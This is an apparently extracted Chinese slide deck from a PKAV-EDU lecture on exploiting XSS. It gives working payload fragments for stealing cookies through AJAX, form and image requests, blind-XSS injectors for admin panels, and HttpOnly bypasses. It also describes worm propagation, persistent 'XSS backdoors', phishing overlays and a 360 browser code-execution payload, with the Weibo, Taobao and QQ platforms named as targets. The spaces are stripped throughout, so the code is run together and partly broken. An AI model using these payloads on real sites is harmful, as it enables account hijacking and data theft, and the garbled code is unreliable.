XSS利用与挖掘- 更新版课件

PKAV-EDU《XSS漏洞利用》第3讲BYGAINOVERXSS利用流程用户种类–普通用户含有XSS攻击代码的页面Cookies数据使用cookies数据登录如何发送cookies数据方式一AJAXXMLHttpRequestIEChrome同域请求ActiveXObject("Microsoft.XMLHTTP")ActiveXObject("MSXML2.XMLHTTP")XMLHttpRequest跨域请求XDomainRequestXMLHttpRequestAJAX数据发送流程vara=window.XMLHttpRequest();a.open("GET","URL?数据",true);a.send(null);open("POST","URL",true);send(数据);r.php跨域Access-Control-Allow-OriginAccess-Control-Allow-MethodsAccess-Control-Allow-Headers跨域请求可以发送数据但不能接受数据数据库邮箱如何发送cookies数据方式二<formid="x"action="POST地址"> <inputtype="hidden"value="数据"name="c"/></form><script> //提交表单 document.getElementById("x").submit();</script>如何发送cookies数据方式三varx=newImage();x.src="URL?数据";调用外部JS文件的方法<scriptsrc="JS地址"></script>静态创建动态创建<script>vars=document.createElement("script");s.src="JS地址";(document.body||document.documentElement).appendChild(s);</script>jsBody调用外部JS文件–借刀杀人$.getScript主公救我！jQuery君企鹅君一个DOMXSS的完整利用代码编写过程alert(1);//%3E&singertype=othe"eval(String.fromCharCode(118,97,))"%20/%3E&singertype=othealert(1)调用外部JSalert(1)iframe到攻击页面中<iframe/src='"><imgstyle=display:nonesrc=1onerror="eval(String.fromCharCode(118,97,...))"/>&singertype=othe'style="display:none"></iframe>拿到Cookies数据后怎么使用？实例演示批量利用Cookies数据qq.plgainover./qq.txtnoproxy一大波Cookies!脚本一大波请求找代理分发给WEBSHELLXSS利用过程中会遇到的问题什么是http-only？什么是Http-only!boolsetcookie(stringname[,stringvalue[,intexpire[,stringpath[,stringdomain[,boolsecure[,boolhttponly]]]]]])PHP5.2.0intsetcookie(stringname,stringvalue,intexpire,stringpath,stringdomain,intsecure);PHP<5.2.0WhenTRUEthecookiewillbemadeaccessibleonlythroughtheHTTPprotocol.Thismeansthatthecookiewon'tbeaccessiblebyscriptinglanguages,suchasJavaScript.只能用于传输，而不能被脚本获取如何查看Cookies是否有http-only？壮哉我大Chrome调试工具！！突破http-only的方法方式一、HTTPTrace(CROSS-SITE TRACING,XST)IE6时代的http-only绕过技术古为今用！插件：Siverlight–Flash-Java突破http-only的方法方式三、WEB服务器漏洞–Apache<2.2.22(CVE-2012-0053)突破Http-only的实际应用新浪微博COOKIES盗取淘宝网COOKIES盗取腾讯某论坛XSS攻击，获取httponlyPKAV10.apache.400三个臭皮匠，顶个诸葛亮！<imgtitle="图片描述"></img><imgtitle="图片描述"></img><imgtitle="图片描述"></img>……15个选项20个字符<imgtitle=""onload="alert(1)"></img>17个字符<imgtitle=""><script>/*"></img><imgtitle="*/alert(1)/*"></img><imgtitle="*/</script>"></img><imgtitle=""><script>/*"></img><imgtitle="*/alert(1)/*"></img><imgtitle="*/</script>"></img>借尸还魂！<imgalt="图片名称"></img>"onload="alert(1)30个字符"onload="9个字符JS代码

21个字符真装不下了！！借尸还魂！<imgsrc=""title=""r="a($('s').r+$('r').r)"id="t"></img>

<imgsrc=""title=""r="QZFL.imports('//xsst"id="s"></img>

<imgsrc=""title=""r="./m.js')"id="r"></img>

<imgsrc=""title=""onload="a=eval;a($('t').r)"></img>模型一模型二<imgsrc=""title="eval(g_userPro)"id="t"></img>

<imgsrc=""title=""onload="eval($('t').title)"></img>27个字符30个字符g_userProQZFL.imports('///m.js')注意https与http！注意在https页面中调用http的JS文件，会被浏览器拦截这一问题！支持https的，比如GAE（*.,各种被墙中….）测试代码见：11.https-http.txt用户种类–管理员信息入侵控制BlindXSS(盲打)如何接触管理员？信息收集水坑攻击目标网站交互点传统XSSBlindXSS有QQ的不一定是人，还有可能是禽兽！难度大！BlindXSS成因金玉其外,败絮其中!开发：只有管理人员使用，何必做的那么完美？页面简陋！毫无过滤BlindXSS成因姓名：建议：前台(攻击者可见)后台(管理员可见)姓名建议gainover软件标题字太小<imgsrc=1onerror=alert(1)>gainover软件标题字太小攻击者最初是看不见后台是什么样子的！！故而叫盲打！方法：不管3721，见到框框就输入代码！BlindXSS代码编写姓名:<span>[输出点]</span>姓名:<inputtype="text"value="

[输出点]

"> <inputtype="text"value='[输出点]

'>3.建议:<textarea>

[输出点]

</textarea>4.建议:<script>vardata=[{sug:"

[输出点]

"}];</script>虽然看不见，但是可以想象！<imgstyle=display:noneonerror=with(document.body)appendChild(document.createElement('script')).src=altalt=src=xx:x>"></textarea></script>'(12.bind.xss.exp.txt)BlindXSS危害-横扫各大厂商！用xss平台沦陷百度投诉中心后台手机feedbackxss盲打金山词霸UED中心(2集连播)雪球网xss盲打后台功能较多的后台各种其它漏洞！某公交集团盲打到获取shellBlindXSS经常出现的场景意见建议WooYun-2012-09547WooYun-2012-14869注册资料WooYun-2013-18049手机客户端WooYun-2012-12308WooYun-2012-11978文章发布WooYun-2013-22125注册资料WooYun-2013-18049中奖短信BlindXSS会遇到的问题及解决办法1.Session过期问题！解决办法：KeepSession程序，即利用一个小程序，获取我们所获得的Cookies数据，每隔一段时间访问目标网站页面，防止Session失效！2.Cookies有http-only、后台在内网被隔离、访问IP受限等。解决办法：尝试使用XSS获取后台页面数据，返回本地后进行分析是否存在可以利用的链接，未发现，继续获取子页面内容进行分析。操作繁琐，需要重复使用XSS盲打！猥琐小技巧：后台打不到，可以直接插一个QQ的XSS过去！蹲管理，收人头！管理员QQ名单被我们修改的首页链接！没事别进草，小心XSS！蹲管理，收Shell!视频Demo:WordPress3.5xssgetshell开源程序后台存在getshell权限后台存在XSS漏洞(直接)或网站其它存在XSS漏洞(间接)下载：实例演示Demo

Code

@13.wordpress.getshell.htm攻击方式之定向攻击XSS点对点，XSS直接发挥作用，获取用户信息攻击方式之定向攻击微博私信IM客户端邮箱腾讯微博私信存储型XSS百度某IM通讯产品存储型XSS腾讯WEBQQ聊天功能XSS-附带消息蠕虫代码

新浪微博私信处存储型XSSQQ空间礼物功能XSS可以攻击任意指定QQ号码用户腾讯QQ聊天框XSS当|XSS蠕虫|与|QQ系统消息推送|双剑合璧之后…

QQ邮箱XSS，邮件中可调用外部javascript文件QQ邮箱XSS，音乐功能导致邮件加载任意javascript某处XSS可导致账号持久劫持

攻击方式之诱骗攻击XSS点对点，XSS不能直接发挥作用clickjackingphishing诱骗的目的：1.让不能自动触发的JS被点击触发 2.获取更为直接的密码信息XSS+clickjacking(点击劫持)Demo:下一页点我有惊喜哦！XSS+Phishing(钓鱼攻击)直接在当前页面动态模拟创建登录窗口2.通过location.href='javascript:\'HTML内容\''的方式重写当前页面内容，浏览器URL保持不变，或者通过设置为假的URL。history.pushState({},"xxx","/cgi-bin/loginpage")攻击方式之水坑攻击如何定义水坑攻击！基本信息收集经常上哪些网站？网站1网站2…..挑出容易被攻陷的网站拿下网站，种下XSS代码直接拿下控制权网站存在存储型XSS烽火戏诸侯,只为博伊人一笑访问网站Cookies数据水坑攻击实例！从得知李老师会上36kr36kr文章页面使用了denglu.cc的评论插件存储型XSSQQ某DOMXSS蹲！！攻击方式之XSS后门有一种存储型XSS叫self–xss！翻译成中文：自X！XSS某商城个人资料1提交这个页面只有自己能看到！只能自己X自己。。。攻击方式之XSS后门XSS某商城个人资料黑客构造页面提交修改资料的请求内含XSS代码受害者点开页面XSSRookit!CSRF反射型XSS攻击方式之XSS后门实例！受害者Iframe调用(function(){functionj(w){window.s=document.createElement('script');window.s.src='///'%2bw%2b'.js';document.body.appendChild(window.s)}j('jq');j('wq')})()Flashxss/wq.jshttp://*/getvfqq.php?cookie={Cookie数据}获取vfwebqq参数设置主题调用外部JS获取cookies劫持WEBQQ持久劫持攻击方式之XSS后门实例！的某FlashXss。获取token保存一个页面链接含XSS代码XSS后门！百度首页Xss后门-可对用户进行持久劫持攻击方式之XSS后门经常出现的场景1.商城及类似网站的个人信息页面2.博客，邮箱等程序的设置/配置页面传统的存储型XSS存储在本地的信息所导致的XSScookies/storage/localdatabase第三方插件，例如FLASH的本地存储（sharedobjcet）--淘宝某处存储型XSS漏洞(WooYun-2013-22080)--当当网：二级域反射XSS变身所有域下存储XSS(WooYun-2013-17527)XSS蠕虫攻击者受害者系统消息推送点开系统消息自定义页面FLASHXSS偷取COOKIESI获取好友列表推送系统消息受害者好友群XSS蠕虫形成的条件中了XSS以后！获取关系列表发布信息受害者受害者受害者受害者循环！不能有验证码！！获取发布信息所需的参数发布信息XSSXSSXSS利用XSS进行虚假消息传播！受害者攻击者被XSS后！二级受害者虚假消息！信任XSS与浏览器！"><iframename="fuck"src=""onload=alert(fuck.window.eval("Install('ExtWebMail','013','360邮件通','','')"))></iframe>360安全浏览器远程代码执行漏洞360一主程序存在严重漏洞varinfo="apptype=1;appdisplaytype=1;appid=/../../../../../windows/;appname=登录管家;appver=056;iconurl=";external.twExtSendMessage2(external.twGetSecurityID(window),"pluginbar","InstallAppItem","",info);360安全浏览器远程代码执行漏洞XSS与浏览器浏览器会在特定的域下提供一些高权限操作360允许在下执行高权限操作QQ会允许域名下的代码调用soso工具栏的COM组件浏览器中部分UI也是由网页完成的，这些页面存在XSS导致高权限操作！浏览器历史记录Chrome浏览器插件xsser.me的跨站漏洞遨游浏览器xss0day遨游浏览器命令执行漏洞maxthon.io.maxthon.io.gram.Program.launchPKAV-EDU多问多想多做THANKS~PKAV-EDU《XSS漏洞挖掘》第3讲BYGAINOVER存储型XSS漏洞挖掘基础见另外